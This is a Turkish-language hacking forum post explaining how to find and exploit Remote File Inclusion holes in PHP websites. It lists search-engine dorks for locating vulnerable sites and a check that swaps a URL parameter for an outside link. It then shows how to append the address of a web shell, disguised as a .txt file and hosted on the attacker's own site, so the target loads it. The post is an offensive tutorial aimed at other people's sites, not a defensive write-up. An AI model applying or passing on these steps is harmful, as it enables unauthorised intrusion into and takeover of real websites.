------=------
|■▶ RFI Açığı ◀■|
------=------
▶ Açığın Özelliği
Açıklı siteyle aynı script diliyle kodlanmış txt uzantılı Shell çağırabileceğiniz bir açıktır.
=====
▶ Açıklı Siteye Ulaşma(Dorkla)
Kod:
inurl:"index.php?include="
inurl:"com_sitemap"
inurl:"*path="
inurl:"*dir="
→ Açığın Mevcudiyetini Tespit
=====
▶ [color="cyan"][b][u]Açığın Mevcudiyetini Anlama(Hedef Sitede)[/u][/b][/color]
[color="yellow"]Id değeri silinerek yerine bir site linki yazılır. ENTERlendiğinde o linki yazılan siteye yönlendirilme gerçekleşirse, açık mevcut demektir. Yönlendirilme gerçekleşmezse, bu da açığın mevcut olmadığı anlamına gelir.[/color]
[Code]http://www.hedefsite.com/welcome.php?id=http://yönlendirileceksite.com
▶ Açığın Kullanımı
Açık bulunulan site linkinin sonuna, yazılım diline göre hazırlanan ve uzantısı .txt biçiminde olan shellerimizden birini yüklediğimiz site linkini sonunda soru işareti olarak ekliyoruz. Formülü:
www.açıklıhedefsite.com/İdDeğeriSil...yasınıBarındı rdığımızSitedekiShellAdresimiz?
Böylelikle Shellimizi çağırmış oluyoruz
←-----=----→
|□■ NOTLAR ■□|
←-----=----→
- Konu, özgündür; [ç]alıntı değildir.
- Bir sonraki muhtemel konumda LFI Açığı'na yer vereceğim. Takipte kalın.
Esenlikler dilerim...
Unnamed
Moderatör tarafında düzenlendi: